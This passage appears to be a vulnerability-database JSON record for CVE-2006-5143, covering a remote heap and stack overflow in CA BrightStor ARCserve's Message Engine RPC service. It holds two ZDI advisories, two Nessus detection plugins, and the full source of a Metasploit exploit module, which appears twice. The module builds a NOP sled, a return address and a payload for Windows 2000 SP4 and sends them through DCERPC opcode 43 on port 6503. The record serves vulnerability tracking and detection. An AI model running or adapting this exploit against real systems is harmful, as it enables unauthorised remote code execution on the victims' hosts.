'process', \n}, \n'Payload' => \n{ \n'Space' => 800, \n'BadChars' => \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n['Windows 2000 SP4 English', { 'Ret' => 0x7c2f6cc8, 'UEF' => 0x7c54144c } ], \n], \n'DisclosureDate' => 'Oct 05 2006', \n'DefaultTarget' => 0)) \n \nregister_options([ Opt::RPORT(6503) ], self.class) \nend \n \ndef exploit \nconnect \n \nhandle = dcerpc_handle('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']]) \nprint_status(\"Binding to #{handle} ...\") \n \ndcerpc_bind(handle) \nprint_status(\"Bound to #{handle} ...\") \n \n# straight forward heap stuffz \nsploit = make_nops(680) + \"\\xeb\\x0a\" + make_nops(2) + [ target.ret ].pack('V') \nsploit << [ target['UEF'] ].pack('V') + payload.encoded \n \nprint_status(\"Trying target #{target.name}...\") \n \nbegin \ndcerpc_call(43, sploit) \nrescue Rex::Proto::DCERPC::Exceptions::NoResponse \nend \n \nhandler \ndisconnect \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82935/message_engine_heap.rb.txt"}], "zdi": [{"lastseen": "2020-06-22T11:40:33", "bulletinFamily": "info", "cvelist": ["CVE-2006-5143"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Computer Associates BrightStor ARCserve Backup, Enterprise Backup, Server Protection Suite and Business Protection Suite. Authentication is not required to exploit this vulnerability and both client and servers are affected. The problem specifically exists within the discovery service which communicates initially over UDP port 41524 and then over TCP port 41523. Due to invalid bounds checking during TCP communications, a stack based buffer overflow may occur in ASBRDCST.DLL during a call to vsprintf().", "modified": "2006-06-22T00:00:00", "published": "2006-10-05T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-06-030/", "id": "ZDI-06-030", "title": "CA BrightStor ARCserve Discovery Service Remote Buffer Overflow Vulnerability", "type": "zdi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-22T11:42:01", "bulletinFamily": "info", "cvelist": ["CVE-2006-5143"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Computer Associates BrightStor ARCserve Backup, Enterprise Backup, Server Protection Suite and Business Protection Suite. Authentication is not required to exploit this vulnerability. The problem specifically exists within ASCORE.dll, a DLL used by the Message Engine RPC server. This service exposes a heap overflow vulnerability through RPC opcode 43 (0x2b) and a stack overflow vulnerability through RPC opcode 45 (0x2d) on TCP port 6503 endpoint with ID dc246bf0-7a7a-11ce-9f88-00805fe43838. The flaws are exposed when passing long strings as the second parameter to either opcode.", "modified": "2006-06-22T00:00:00", "published": "2006-10-05T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-06-031/", "id": "ZDI-06-031", "title": "CA Multiple Product Message Engine RPC Server Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-08-18T00:43:26", "description": "This module exploits a heap overflow in Computer Associates BrightStor ARCserve Backup 11.5. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.\n", "published": "2007-02-15T19:08:55", "type": "metasploit", "title": "CA BrightStor ARCserve Message Engine Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5143"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/BRIGHTSTOR/MESSAGE_ENGINE_HEAP", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::DCERPC\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'CA BrightStor ARCserve Message Engine Heap Overflow',\n 'Description' => %q{\n This module exploits a heap overflow in Computer Associates BrightStor ARCserve Backup\n 11.5. By sending a specially crafted RPC request, an attacker could overflow the\n buffer and execute arbitrary code.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2006-5143' ],\n [ 'OSVDB', '29533' ],\n [ 'BID', '20365' ],\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 SP4 English', { 'Ret' => 0x7c2f6cc8, 'UEF' => 0x7c54144c } ],\n ],\n 'DisclosureDate' => 'Oct 05 2006',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(6503)\n ])\n end\n\n def exploit\n connect\n\n handle = dcerpc_handle('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])\n print_status(\"Binding to #{handle} ...\")\n\n dcerpc_bind(handle)\n print_status(\"Bound to #{handle} ...\")\n\n # straight forward heap stuffz\n sploit = make_nops(680) + \"\\xeb\\x0a\" + make_nops(2) + [ target.ret ].pack('V')\n sploit << [ target['UEF'] ].pack('V') + payload.encoded\n\n print_status(\"Trying target #{target.name}...\")\n\n begin\n dcerpc_call(43, sploit)\n rescue Rex::Proto::DCERPC::Exceptions::NoResponse\n end\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/brightstor/message_engine_heap.rb"}], "nessus": [{"lastseen": "2021-01-01T01:21:37", "description": "This host is running BrightStor ARCServe DBA server for Windows.\n\nThe remote version of this software is affected by multiple buffer\noverflow vulnerabilities. \n\nAn attacker, by sending a specially crafted packet, may be able to\nexecute code on the remote host.", "edition": 23, "published": "2006-10-06T00:00:00", "title": "CA BrightStor ARCserve Backup DBASVR for Windows Multiple Remote Buffer Overflows", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-5142", "CVE-2006-5143"], "modified": "2021-01-02T00:00:00", "cpe": [], "id": "ARCSERVE_WINDOWS_DBASVR_MULTIPLE.NASL", "href": "https://www.tenable.com/plugins/nessus/22511", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# BAB r11.5 sp1 and below - QO81201\n# BAB r11.1 - QO82863\n# BAB r11.0 - QI82917\n# BEB r10.5 - QO82858\n# BAB v9.01 - QO82856\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22511);\n script_version (\"1.20\");\n\n script_cve_id(\"CVE-2006-5142\", \"CVE-2006-5143\");\n script_bugtraq_id(20364, 20365);\n\n script_name(english:\"CA BrightStor ARCserve Backup DBASVR for Windows Multiple Remote Buffer Overflows\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host.\" );\n script_set_attribute(attribute:\"description\", value:\n\"This host is running BrightStor ARCServe DBA server for Windows.\n\nThe remote version of this software is affected by multiple buffer\noverflow vulnerabilities. \n\nAn attacker, by sending a specially crafted packet, may be able to\nexecute code on the remote host.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.tippingpoint.com/security/advisories/TSRT-06-11.html\" );\n # https://web.archive.org/web/20061017184949/http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eed70140\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Apply service pack 2 for Arcserve 11.5 or install the security patch.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CA BrightStor ARCserve Message Engine Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/10/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2006/10/05\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/10/05\");\n script_cvs_date(\"Date: 2018/06/27 18:42:27\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n script_summary(english:\"Check buffer overflow in BrightStor ARCServe for Windows DBASVR\");\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_require_ports (6071);\n\n script_dependencies(\"arcserve_discovery_service_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"ARCSERVE/Discovery/Version\");\n exit(0);\n}\n\n\ninclude ('smb_func.inc');\n\nfunction RPC_Bind ()\n{\n local_var ret, resp, soc;\n\n soc = session_get_socket ();\n\n ret = dce_rpc_bind(cid:session_get_cid(), uuid:\"88435ee0-861a-11ce-b86b-00001b27f656\", vers:1);\n send (socket:soc, data:ret);\n resp = recv (socket:soc, length:4096);\n\n if (!resp)\n return -1;\n\n ret = dce_rpc_parse_bind_ack (data:resp);\n if (isnull (ret) || (ret != 0))\n return -1;\n\n return 0;\n}\n\n\n \nfunction SERGetAgentDisplayName ()\n{\n local_var data, ret, resp, val, soc;\n\n soc = session_get_socket ();\n\n session_set_unicode (unicode:0);\n \n data = \n class_name (name:crap(data:\"A\", length:0x10)) +\n raw_dword(d:100);\n\n session_set_unicode (unicode:1);\n\n ret = dce_rpc_request (code:0x00, data:data);\n send (socket:soc, data:ret);\n resp = recv (socket:soc, length:4096);\n\n resp = dce_rpc_parse_response (data:resp);\n if (strlen(resp) != 20)\n return 0;\n\n val = get_dword (blob:resp, pos:16);\n if (val == 5)\n return 1;\n\n return 0;\n}\n\nver = get_kb_item(\"ARCSERVE/Discovery/Version\");\nif (!ver) exit(0);\n\nmatches = eregmatch(string:ver, pattern:\"^[a-z]([0-9]+)\\.([0-9]+) \\(build ([0-9]+)\\)$\");\nif (isnull(matches)) exit(0);\n\nver = matches[1];\n\n# Exit on version > 12 (safeapi)\nif (int(ver) > 11) exit(0);\n\nport = 6071;\nif ( ! get_port_state(port) ) exit(0);\nsoc = open_sock_tcp (port);\nif (!soc) exit (0);\n\nsession_init (socket:soc);\n\nret = RPC_Bind ();\nif (ret != 0)\n exit (0);\n\nret = SERGetAgentDisplayName ();\nif (ret == 1)\n security_hole(port);\n\nclose (soc);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:21:37", "description": "This host is running BrightStor ARCServe for Windows.\n\nThe remote version of this software has multiple buffer overflow\nvulnerabilities. \n\nAn attacker, by sending a specially crafted packet, may be able to\nexecute code on the remote host.", "edition": 25, "published": "2006-10-06T00:00:00", "title": "CA BrightStor ARCserve Backup for Windows Multiple Remote Buffer Overflows (QO81201)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-5142", "CVE-2006-5143"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:ca:arcserve_backup"], "id": "ARCSERVE_WINDOWS_MULTIPLE.NASL", "href": "https://www.tenable.com/plugins/nessus/22510", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22510);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n\n script_cve_id(\"CVE-2006-5142\", \"CVE-2006-5143\");\n script_bugtraq_id(20364, 20365);\n\n script_name(english:\"CA BrightStor ARCserve Backup for Windows Multiple Remote Buffer Overflows (QO81201)\");\n script_summary(english:\"Check buffer overflow in BrightStor ARCServe for Windows\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host.\");\n script_set_attribute(attribute:\"description\", value:\n\"This host is running BrightStor ARCServe for Windows.\n\nThe remote version of this software has multiple buffer overflow\nvulnerabilities. \n\nAn attacker, by sending a specially crafted packet, may be able to\nexecute code on the remote host.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-06-031/\");\n # https://web.archive.org/web/20061017184949/http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eed70140\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply service pack 2 for Arcserve 11.5 or install the security patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CA BrightStor ARCserve Message Engine Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/10/05\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/10/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ca:arcserve_backup\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_require_ports (6503);\n exit(0);\n}\n\n\ninclude ('smb_func.inc');\n\nfunction RPC_Bind ()\n{\n local_var ret, resp, soc;\n\n soc = session_get_socket ();\n\n ret = dce_rpc_bind(cid:session_get_cid(), uuid:\"dc246bf0-7a7a-11ce-9f88-00805fe43838\", vers:1);\n send (socket:soc, data:ret);\n resp = recv (socket:soc, length:4096);\n\n if (!resp)\n return -1;\n\n ret = dce_rpc_parse_bind_ack (data:resp);\n if (isnull (ret) || (ret != 0))\n return -1;\n\n return 0;\n}\n\n\nfunction RPC_QSICreateQueue ()\n{\n local_var data, ret, resp, val, soc;\n\n soc = session_get_socket ();\n\n session_set_unicode (unicode:0);\n\n data = \n\tclass_name (name:crap(data:\"A\", length:0x31)) + \n\traw_dword (d:1) +\n\tclass_name (name:\"nessus\");\n\n session_set_unicode (unicode:1);\n\n ret = dce_rpc_request (code:0x01, data:data);\n send (socket:soc, data:ret);\n resp = recv (socket:soc, length:4096);\n\n resp = dce_rpc_parse_response (data:resp);\n if (strlen(resp) != 8)\n return 0;\n\n val = get_dword (blob:resp, pos:4);\n if (val != 3)\n return 1;\n\n return 0;\n}\n\n\n\nport = 6503;\nif ( ! get_port_state(port) ) exit(0);\nsoc = open_sock_tcp (port);\nif (!soc) exit (0);\n\nsession_init (socket:soc);\n\nret = RPC_Bind ();\nif (ret != 0)\n exit (0);\n\nret = RPC_QSICreateQueue ();\nif (ret != 0)\n security_hole(port);\n\nclose (soc);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}